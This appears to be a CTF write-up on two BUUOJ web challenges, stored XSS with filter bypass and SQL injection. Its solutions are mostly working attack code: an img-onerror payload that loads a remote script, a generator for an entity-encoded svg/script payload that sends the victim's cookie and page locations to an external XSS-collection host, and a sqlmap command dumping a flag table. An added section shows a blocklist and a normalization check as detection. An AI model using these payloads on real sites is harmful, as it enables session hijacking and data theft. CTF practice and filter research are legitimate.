# BUU XSS COURSE 1 & [CISCN2019 华东北赛区 (East China North Division)] Web2

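I haven't done many XSS challenges, and they basically never show up in competitions either (=_=), so here is a summary of the two I did today.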

# BUU XSS COURSE 1

## Solution

```html
</textarea>'"><img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fxss.buuoj.cn%2F8sVXk7%22%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//>
```


End.

# [CISCN2019 华东北赛区 (East China North Division)] Web2

1. Stored XSS and filter bypass

2. SQL injection

## Solution

```python
# JavaScript that reports the page location, cookie and opener to the XSS platform.
in_str = "(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=xpqwIP&keepsession=0&location='+escape((function(){try{return document.location.href}catch(e){return''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return''}})())+'&opener='+escape((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})());})();"

# Encode every character as a decimal character reference (no trailing semicolon).
output = ""
for c in in_str:
    output += "&#" + str(ord(c))

# Inside <svg>, the <script> body is parsed as text, so the references are decoded before the JS runs.
print("<svg><script>eval&#40&#34" + output + "&#34&#41</script>")
```
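Why the encoding above slips past a keyword filter, and how decoding character references before matching closes the gap, shown as an added example that is not part of the original write-up. The blocklist and the sample payload are constructed assumptions, since the challenge's real filter is not shown on the page.

```python
import html
import re

# Hypothetical keyword blocklist; the challenge's real filter is not shown on the page.
BLOCKLIST = ("document.cookie", "location.href", "eval(")

# <script> bodies nested in <svg> are parsed as ordinary text, so the HTML
# parser decodes character references there before the JS engine runs.
SVG_SCRIPT = re.compile(r"<svg\b[^>]*>.*?<script\b[^>]*>(.*?)</script", re.I | re.S)
CHAR_REF = re.compile(r"&#(?:\d+|x[0-9a-f]+);?", re.I)


def encode_refs(text):
    """Same encoding as the page's script: decimal references, no semicolon."""
    return "".join("&#" + str(ord(c)) for c in text)


def normalize(markup, max_rounds=5):
    """Decode character references until the text stops changing."""
    for _ in range(max_rounds):
        decoded = html.unescape(markup)
        if decoded == markup:
            break
        markup = decoded
    return markup


def blocklist_hits(markup, decode):
    """Return blocklisted tokens found, optionally after normalization."""
    haystack = (normalize(markup) if decode else markup).lower()
    return [tok for tok in BLOCKLIST if tok in haystack]


def svg_script_uses_char_refs(markup):
    """Flag character references inside a <script> nested in <svg>."""
    return any(CHAR_REF.search(body) for body in SVG_SCRIPT.findall(markup))


# Constructed sample input, wrapped the same way as the page's print() call.
SAMPLE = ("<svg><script>eval&#40&#34"
          + encode_refs("console.log(document.cookie)")
          + "&#34&#41</script>")

if __name__ == "__main__":
    print("raw hits:       ", blocklist_hits(SAMPLE, decode=False))
    print("normalized hits:", blocklist_hits(SAMPLE, decode=True))
    print("svg/script refs:", svg_script_uses_char_refs(SAMPLE))
```

Matching on the raw submission finds nothing, while the normalized text exposes the blocked tokens. For stored content, output encoding and a Content-Security-Policy remain the primary controls, with this kind of check as a detection signal.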


The truncated-MD5 check is brute-forced with a Python script; there are plenty of them on Baidu.

```bash
sqlmap -u "http://6e5d7496-7b5f-4d94-b0e3-74ccf262a4d2.node3.buuoj.cn/admin.php?id=4" --cookie="PHPSESSID=8925446bf891203de8f1226880a9e296" -T flag --dump --flush-session --fresh-queries
```


